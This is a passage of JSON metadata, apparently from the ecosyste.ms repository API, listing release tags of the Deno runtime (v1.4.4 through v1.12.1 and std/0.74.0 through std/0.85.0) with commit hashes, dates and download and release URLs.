1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.